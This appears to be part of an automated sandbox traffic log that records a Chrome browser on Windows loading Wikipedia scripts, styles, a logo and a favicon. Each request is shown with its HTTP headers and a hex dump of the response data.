                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 5c 22 32 30 5c 5c 5c 22 20 68 65 69 67 68 74 3d 5c 5c 5c 22 32 30 5c 5c 5c 22 20 76 69 65 77 42 6f 78 3d 5c 5c 5c 22 30 20 30 20 32 30 20 32 30 5c 5c 5c 22 20 66 69 6c 6c 3d 5c 5c 5c 22 25 32 33 30 30 30 30 30 30 5c 5c 5c 22 5c 75 30 30 33 45 5c 75 30 30 33 43 70 61 74 68 20 64 3d 5c 5c 5c 22 4d 31 35 20 32 61 37 2e 36 35 20 37 2e 36 35 20 30 20 30 30 2d 35 20 32 20 37 2e 36 35 20 37 2e 36 35 20 30 20 30 30 2d 35 2d 32 48 31 76 31 35 68 34 61 37 2e 36 35 20 37 2e 36 35 20 30 20 30 31 35 20 32 20 37 2e 36 35 20 37 2e 36 35 20 30 20 30 31 35 2d 32 68 34 56 32 7a 6d 32 2e 35 20 31 33 2e 35 48 31 34 61 34 2e 33 38 20 34 2e 33 38 20 30 20 30 30 2d 33 20 31 56 35 73 31 2d 31 2e 35 20 34 2d 31 2e 35 68 32 2e 35 7a 5c 5c 5c 22 2f 5c 75 30 30 33 45 5c 75 30 30 33
                                                                                                                                                                                                                                      Data Ascii: \"20\\\" height=\\\"20\\\" viewBox=\\\"0 0 20 20\\\" fill=\\\"%23000000\\\"\u003E\u003Cpath d=\\\"M15 2a7.65 7.65 0 00-5 2 7.65 7.65 0 00-5-2H1v15h4a7.65 7.65 0 015 2 7.65 7.65 0 015-2h4V2zm2.5 13.5H14a4.38 4.38 0 00-3 1V5s1-1.5 4-1.5h2.5z\\\"/\u003E\u003
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC2734INData Raw: 72 65 74 75 72 6e 20 74 68 65 20 70 72 65 76 69 6f 75 73 20 73 74 61 74 65 2e 20 49 66 20 79 6f 75 20 77 61 6e 74 20 74 68 69 73 20 72 65 64 75 63 65 72 20 74 6f 20 68 6f 6c 64 20 6e 6f 20 76 61 6c 75 65 2c 20 79 6f 75 20 63 61 6e 20 72 65 74 75 72 6e 20 6e 75 6c 6c 20 69 6e 73 74 65 61 64 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 2e 27 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72
                                                                                                                                                                                                                                      Data Ascii: return the previous state. If you want this reducer to hold no value, you can return null instead of undefined.'}function s(e,t){return function(){return t(e.apply(this,arguments))}}function u(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumer
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 74 52 65 64 75 63 65 72 20 74 6f 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 2e 22 29 3b 73 3d 65 2c 6d 28 7b 74 79 70 65 3a 69 2e 52 45 50 4c 41 43 45 7d 29 7d 7d 29 5b 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 68 3b 72 65 74 75 72 6e 28 65 3d 7b 73 75 62 73 63 72 69 62 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 6e 75 6c 6c 3d 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 45 78 70 65 63 74 65 64 20 74 68 65 20 6f 62 73 65 72 76 65 72 20 74 6f 20 62 65 20 61 6e 20 6f 62 6a 65 63 74 2e 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 65 2e 6e 65 78 74 26 26 65 2e 6e 65 78 74 28 66 28 29 29 7d 72 65 74 75 72 6e 20 6e 28 29 2c 7b 75 6e 73 75
                                                                                                                                                                                                                                      Data Ascii: tReducer to be a function.");s=e,m({type:i.REPLACE})}})[r]=function(){var e,t=h;return(e={subscribe:function(e){if("object"!=typeof e||null===e)throw new TypeError("Expected the observer to be an object.");function n(){e.next&&e.next(f())}return n(),{unsu
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 73 61 76 65 22 29 2c 68 65 6c 70 54 65 78 74 3a 6d 77 2e 6d 73 67 28 22 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 2d 68 65 6c 70 22 29 2c 6f 6b 4c 61 62 65 6c 3a 6d 77 2e 6d 73 67 28 22 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 2d 68 65 6c 70 2d 6f 6b 22 29 2c 63 68 6f 69 63 65 73 3a 74 7d 29 7d 28 74 29 3b 72 65 74 75 72 6e 20 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 73 61 76 65 22 29 2e 0a 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 73 61 76 65 53 65 74 74 69 6e 67 73 28 41 72 72 61 79 2e 66 72 6f 6d 28 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 69 6e 70 75 74 22 29 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74
                                                                                                                                                                                                                                      Data Ascii: save"),helpText:mw.msg("popups-settings-help"),okLabel:mw.msg("popups-settings-help-ok"),choices:t})}(t);return n.querySelector(".save").addEventListener("click",(function(){e.saveSettings(Array.from(n.querySelectorAll("input")).reduce((function(e,t){ret
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC128INData Raw: 70 6f 70 75 70 73 2d 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 65 6e 61 62 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 75 2e 67 65 74 28 74 29 7d 2c 73 74 6f 72 65 50 72 65 76 69 65 77 54 79 70 65 45 6e 61 62 6c 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 6d 77 65 2d 70 6f 70 75 70 73 2d 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2d 65 6e 61 62 6c
                                                                                                                                                                                                                                      Data Ascii: popups-".concat(e,"-enabled");return null===u.get(t)},storePreviewTypeEnabled:function(e,t){var n="mwe-popups-".concat(e,"-enabl
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 65 64 22 29 3b 74 3f 75 2e 72 65 6d 6f 76 65 28 6e 29 3a 75 2e 73 65 74 28 6e 2c 22 30 22 29 2c 6d 77 2e 74 72 61 63 6b 28 22 50 6f 70 75 70 73 2e 53 65 74 74 69 6e 67 43 68 61 6e 67 65 22 2c 7b 70 72 65 76 69 65 77 54 79 70 65 3a 65 2c 61 63 74 69 6f 6e 3a 74 3f 22 61 6e 6f 6e 79 6d 6f 75 73 45 6e 61 62 6c 65 64 22 3a 22 61 6e 6f 6e 79 6d 6f 75 73 44 69 73 61 62 6c 65 64 22 7d 29 7d 7d 29 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 63 7c 7c 28 28 6c 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 6d 77 65 2d 70 6f 70 75 70 73 2d 6f 76 65 72 6c 61 79 22 29 2c 63 3d 73 65 28 65 2c 74 29 29 2c 7b 72 65 66 72 65 73 68 3a 66 75 6e 63 74 69
                                                                                                                                                                                                                                      Data Ascii: ed");t?u.remove(n):u.set(n,"0"),mw.track("Popups.SettingChange",{previewType:e,action:t?"anonymousEnabled":"anonymousDisabled"})}}),g=function(e,t){return c||((l=document.createElement("div")).classList.add("mwe-popups-overlay"),c=se(e,t)),{refresh:functi
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 20 6d 61 69 6e 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 2d 66 6f 72 6d 20 66 6f 72 6d 20 6c 61 62 65 6c 20 5c 75 30 30 33 45 20 73 70 61 6e 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 65 6d 70 68 61 73 69 7a 65 64 2c 23 31 30 31 34 31 38 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 7d 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67 73 20 6d 61 69 6e 23 6d 77 65 2d 70 6f 70 75 70 73 2d 73 65 74 74 69 6e 67
                                                                                                                                                                                                                                      Data Ascii: in-left:10px;flex-direction:column}#mwe-popups-settings main#mwe-popups-settings-form form label \u003E span{color:var(--color-emphasized,#101418);font-size:14px;font-weight:bold;display:block;margin-bottom:5px}#mwe-popups-settings main#mwe-popups-setting
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC128INData Raw: 6e 61 62 6c 65 64 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d 61 63 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 69 76 65 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 70 72 6f 67 72 65 73 73 69 76 65 2d 73 75 62 74 6c 65 2d 2d 68 6f 76 65 72 2c 23 64 63 65 33 66 39 29 3b 63 6f 6c 6f 72 3a 76 61 72
                                                                                                                                                                                                                                      Data Ascii: nabled.cdx-button--action-progressive:hover{background-color:var(--background-color-progressive-subtle--hover,#dce3f9);color:var
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC16320INData Raw: 28 2d 2d 63 6f 6c 6f 72 2d 70 72 6f 67 72 65 73 73 69 76 65 2d 2d 68 6f 76 65 72 2c 23 33 30 35 36 61 39 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 70 72 6f 67 72 65 73 73 69 76 65 2d 2d 68 6f 76 65 72 2c 23 33 30 35 36 61 39 29 7d 40 73 75 70 70 6f 72 74 73 20 28 28 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 20 6f 72 20 28 6d 61 73 6b 2d 69 6d 61 67 65 3a 6e 6f 6e 65 29 29 7b 2e 63 64 78 2d 62 75 74 74 6f 6e 3a 65 6e 61 62 6c 65 64 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d 61 63 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 69 76 65 3a 68 6f 76 65 72 20 2e 63 64 78 2d 62 75 74 74 6f 6e 5f 5f 69 63 6f 6e 2c 2e 63 64 78 2d 62 75 74 74 6f 6e 2e 63 64 78 2d 62 75 74 74 6f 6e 2d 2d
                                                                                                                                                                                                                                      Data Ascii: (--color-progressive--hover,#3056a9);border-color:var(--border-color-progressive--hover,#3056a9)}@supports ((-webkit-mask-image:none) or (mask-image:none)){.cdx-button:enabled.cdx-button--action-progressive:hover .cdx-button__icon,.cdx-button.cdx-button--


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      70192.168.2.1649798185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC829OUTGET /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1kwga HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC1101INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 07:31:24 GMT
                                                                                                                                                                                                                                      etag: W/"1kwga"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 08:11:56 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&sourcemap=1&version=1kwga
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/202849
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 15145
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC13694INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 6d 77 2e 63 6f 6e 66 69 67 2e 76 61 6c 75 65 73 2e 77 62 43 75 72 72 65 6e 74 53 69 74 65 44 65 74 61 69 6c 73 40 6c 6e 32 39 64 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 6d 77 2e 63 6f 6e 66 69 67 2e 73 65 74 28 7b 22 77 62 43 75 72 72 65 6e 74 53 69 74 65 44 65 74 61 69 6c 73 22 3a 7b 22 73 68 6f 72 74 4e 61 6d 65 22 3a 22 45 6e 67 6c 69 73 68 22 2c 22 6e 61 6d 65 22 3a 22 45 6e 67 6c 69 73 68 22 2c 22 69 64 22 3a 22 65 6e 77 69 6b 69 22 2c 22 70 61 67 65 55 72 6c 22 3a 22 2f 2f 65 6e 2e 77 69 6b 69 70 65 64 69 61 2e 6f 72 67 2f 77 69 6b 69 2f 24 31 22 2c 22 61 70 69 55 72 6c 22 3a 22 2f
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["mw.config.values.wbCurrentSiteDetails@ln29d",function($,jQuery,require,module){mw.config.set({"wbCurrentSiteDetails":{"shortName":"English","name":"English","id":"enwiki","pageUrl":"//en.wikipedia.org/wiki/$1","apiUrl":"/
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC1451INData Raw: 7a 25 32 32 2f 25 33 45 25 33 43 2f 67 25 33 45 25 33 43 2f 73 76 67 25 33 45 5c 22 29 7d 2e 6f 6f 2d 75 69 2d 69 6d 61 67 65 2d 70 72 6f 67 72 65 73 73 69 76 65 2e 6f 6f 2d 75 69 2d 69 63 6f 6e 2d 72 65 64 6f 2c 2e 6d 77 2d 75 69 2d 69 63 6f 6e 2d 72 65 64 6f 2d 70 72 6f 67 72 65 73 73 69 76 65 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 5c 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 25 32 32 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 25 32 32 20 77 69 64 74 68 3d 25 32 32 32 30 25 32 32 20 68 65 69 67 68 74 3d 25 32 32 32 30 25 32 32 20 76 69 65 77 42 6f 78 3d 25 32 32 30 20 30 20 32 30 20 32 30 25 32 32 25 33 45 25 33 43
                                                                                                                                                                                                                                      Data Ascii: z%22/%3E%3C/g%3E%3C/svg%3E\")}.oo-ui-image-progressive.oo-ui-icon-redo,.mw-ui-icon-redo-progressive:before{background-image:url(\"data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22 width=%2220%22 height=%2220%22 viewBox=%220 0 20 20%22%3E%3C


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      71192.168.2.1649800185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC781OUTGET /wiki/Special:CentralAutoLogin/start?type=script HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC1073INHTTP/1.1 302 Found
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:35:57 GMT
                                                                                                                                                                                                                                      server: mw-web.codfw.main-ddbb68945-6hv79
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      accept-ch:
                                                                                                                                                                                                                                      vary: Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization
                                                                                                                                                                                                                                      location: https://login.wikimedia.org/wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script
                                                                                                                                                                                                                                      content-length: 0
                                                                                                                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      age: 1017
                                                                                                                                                                                                                                      x-cache: cp3072 miss, cp3072 hit/9926
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      cache-control: private, s-maxage=0, max-age=0, must-revalidate, no-transform
                                                                                                                                                                                                                                      connection: close


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      72192.168.2.1649801185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:54 UTC571OUTGET /static/images/project-logos/enwiki.png HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC898INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 23:28:09 GMT
                                                                                                                                                                                                                                      etag: "1f0f-62309f0dda7c0"
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 23:28:09 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      content-length: 7951
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      age: 66285
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/176002
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC7951INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 87 00 00 00 9b 08 03 00 00 00 7f 2d 78 d8 00 00 02 fd 50 4c 54 45 47 70 4c cc cd cd be bf c0 94 96 96 00 00 00 a6 a8 aa 57 57 57 cf cf d0 d6 d7 d8 ac ac ae a2 a3 a5 b7 b8 b9 e0 e0 e0 c8 c8 c8 9c 9e a0 53 53 53 b2 b4 b6 b5 b6 b8 98 98 98 d7 d6 d7 00 00 00 d4 d5 d5 ce ce d0 bc bd bf ca c9 ca 3c 3c 3f b7 b7 b8 a6 a6 a7 a9 aa ac 80 82 87 e3 e3 e3 00 00 00 b7 b8 ba 9b 9c 9e 85 87 89 00 00 00 c1 c1 c3 00 00 00 8e 8e 8f 54 52 54 58 56 57 a1 a2 a5 e1 e1 e2 d9 d9 da e1 e1 e2 df df e0 61 60 61 a1 a2 a4 e4 e4 e5 e6 e5 e6 94 95 97 e4 e4 e5 9b 9b 9d d3 d3 d3 d8 d8 d9 90 92 94 89 8b 8d 5e 5e 5e ab ac af 82 84 87 ae af af 6f 6f 70 89 8a 8c 85 87 89 6e 6e 6f 78 79 7a 7b 7b 7b da da da 8a 8c 8e 54 54 54 57 57 58 c0
                                                                                                                                                                                                                                      Data Ascii: PNGIHDR-xPLTEGpLWWWSSS<<?TRTXVWa`a^^^oopnnoxyz{{{TTTWWX


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      73192.168.2.1649803185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC561OUTGET /static/favicon/wikipedia.ico HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:52:55 UTC938INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 22:53:38 GMT
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 12:11:05 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"aae-62309f0dda7c0"
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 68357
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/2760552
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 2734
                                                                                                                                                                                                                                      connection: close
